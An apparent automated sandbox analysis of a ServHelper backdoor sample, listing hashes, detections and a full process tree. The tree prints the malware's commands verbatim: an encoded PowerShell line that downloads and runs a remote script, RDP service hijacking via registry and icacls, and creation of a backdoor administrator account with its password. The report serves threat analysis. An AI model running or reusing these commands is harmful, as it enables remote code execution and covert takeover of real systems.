Analysis
-
max time kernel
138s -
max time network
146s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
11-08-2021 08:09
Static task
static1
Behavioral task
behavioral1
Sample
bfe0ac25eeeb759f7c8e06229c7313a2.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
bfe0ac25eeeb759f7c8e06229c7313a2.exe
Resource
win10v20210408
General
-
Target
bfe0ac25eeeb759f7c8e06229c7313a2.exe
-
Size
5.9MB
-
MD5
bfe0ac25eeeb759f7c8e06229c7313a2
-
SHA1
199c1fbd29f9ec98b83464763dac63ef80998bb3
-
SHA256
be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
-
SHA512
a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 13 2024 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 428 icacls.exe 952 takeown.exe 1684 icacls.exe 968 icacls.exe 772 icacls.exe 616 icacls.exe 1668 icacls.exe 1356 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 704 704 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exepid process 616 icacls.exe 1668 icacls.exe 1356 icacls.exe 428 icacls.exe 952 takeown.exe 1684 icacls.exe 968 icacls.exe 772 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XC2LLWIOB5R07L41GXKV.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d8f150c2-4e20-4eea-9851-942e1c8c185c powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d372afd-2ed0-46e4-9636-95fcd403f796 powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2e256687-099a-49d9-b319-558eaf191221 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5ffe11fd-951d-406f-9bba-8f00e993b47e powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e7b6510f-db1b-4810-a09c-590057c80a63 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_df1cbe1c-84fa-4429-a4c0-5b9650161aed powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bce54f89-a05f-4ba4-9c4e-b0d91b6999cc powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f0d93a20-279b-4b2e-8b1d-d6e150eb229d powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4eaa5ffd-2c0c-4823-8478-329c21979dcb powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f3b19608-e584-4e88-bcac-97afdce2eb6f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2c79fe24-b267-40e1-87d8-40206420cc1c powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 0034a89c998ed701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Processes:
bfe0ac25eeeb759f7c8e06229c7313a2.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 bfe0ac25eeeb759f7c8e06229c7313a2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 bfe0ac25eeeb759f7c8e06229c7313a2.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1808 powershell.exe 1808 powershell.exe 880 powershell.exe 880 powershell.exe 636 powershell.exe 636 powershell.exe 1600 powershell.exe 1600 powershell.exe 1808 powershell.exe 1808 powershell.exe 1808 powershell.exe 2024 powershell.exe 2024 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 468 704 704 704 704 -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
bfe0ac25eeeb759f7c8e06229c7313a2.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2016 bfe0ac25eeeb759f7c8e06229c7313a2.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 880 powershell.exe Token: SeDebugPrivilege 636 powershell.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeRestorePrivilege 968 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1668 WMIC.exe Token: SeIncreaseQuotaPrivilege 1668 WMIC.exe Token: SeAuditPrivilege 1668 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1668 WMIC.exe Token: SeIncreaseQuotaPrivilege 1668 WMIC.exe Token: SeAuditPrivilege 1668 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1600 WMIC.exe Token: SeIncreaseQuotaPrivilege 1600 WMIC.exe Token: SeAuditPrivilege 1600 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1600 WMIC.exe Token: SeIncreaseQuotaPrivilege 1600 WMIC.exe Token: SeAuditPrivilege 1600 WMIC.exe Token: SeDebugPrivilege 2024 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bfe0ac25eeeb759f7c8e06229c7313a2.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 2016 wrote to memory of 1808 2016 bfe0ac25eeeb759f7c8e06229c7313a2.exe powershell.exe PID 2016 wrote to memory of 1808 2016 bfe0ac25eeeb759f7c8e06229c7313a2.exe powershell.exe PID 2016 wrote to memory of 1808 2016 bfe0ac25eeeb759f7c8e06229c7313a2.exe powershell.exe PID 1808 wrote to memory of 276 1808 powershell.exe csc.exe PID 1808 wrote to memory of 276 1808 powershell.exe csc.exe PID 1808 wrote to memory of 276 1808 powershell.exe csc.exe PID 276 wrote to memory of 1148 276 csc.exe cvtres.exe PID 276 wrote to memory of 1148 276 csc.exe cvtres.exe PID 276 wrote to memory of 1148 276 csc.exe cvtres.exe PID 1808 wrote to memory of 880 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 880 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 880 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 636 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 636 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 636 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 1600 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 1600 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 1600 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 952 1808 powershell.exe takeown.exe PID 1808 wrote to memory of 952 1808 powershell.exe takeown.exe PID 1808 wrote to memory of 952 1808 powershell.exe takeown.exe PID 1808 wrote to memory of 1684 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1684 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1684 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 968 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 968 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 968 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 772 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 772 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 772 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 616 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 616 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 616 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1668 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1668 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1668 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1356 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1356 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1356 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 428 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 428 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 428 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1624 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1624 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1624 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1900 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1900 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1900 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1552 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1552 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1552 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1640 1808 powershell.exe net.exe PID 1808 wrote to memory of 1640 1808 powershell.exe net.exe PID 1808 wrote to memory of 1640 1808 powershell.exe net.exe PID 1640 wrote to memory of 556 1640 net.exe net1.exe PID 1640 wrote to memory of 556 1640 net.exe net1.exe PID 1640 wrote to memory of 556 1640 net.exe net1.exe PID 1808 wrote to memory of 792 1808 powershell.exe cmd.exe PID 1808 wrote to memory of 792 1808 powershell.exe cmd.exe PID 1808 wrote to memory of 792 1808 powershell.exe cmd.exe PID 792 wrote to memory of 1780 792 cmd.exe cmd.exe PID 792 wrote to memory of 1780 792 cmd.exe cmd.exe PID 792 wrote to memory of 1780 792 cmd.exe cmd.exe PID 1780 wrote to memory of 1680 1780 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"1⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrlp5nw3\xrlp5nw3.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:276 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3321.tmp" "c:\Users\Admin\AppData\Local\Temp\xrlp5nw3\CSC5ACBF81FDBDD4E84B343FD79E2989E3B.TMP"4⤵PID:1148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:952 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1684 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:968 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:772 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:616 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1668 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1356 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:428 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1624
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1900 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1552
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:556
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:328
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1736
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1580
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1828
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1680
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:792
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:276
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:2000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:880
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc baKg7SAt /add1⤵PID:1840
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc baKg7SAt /add2⤵PID:1552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc baKg7SAt /add3⤵PID:516
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1656
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:792
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD1⤵PID:772
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD2⤵PID:1356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD3⤵PID:1888
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1540
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1624
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc baKg7SAt1⤵PID:1316
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc baKg7SAt2⤵PID:1680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc baKg7SAt3⤵PID:1656
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:880
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1624
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1656
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_98e5137d-ba9e-411c-9a2f-fad7524189bc
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_993b6792-8dae-431d-a6d9-63e682d577fb
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a6031e76-d08b-4806-999e-9c5b096d4072
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_abb0b0c9-7510-4ec7-8ee9-fa234a8f8744
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c0d07bfb-4102-4673-8cd5-5f3940bba500
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d5f08cdb-e92d-48ed-a7e0-b0bb51330c54
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f62b7ef6-fc95-48d2-a820-c0f76e55cfb2
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
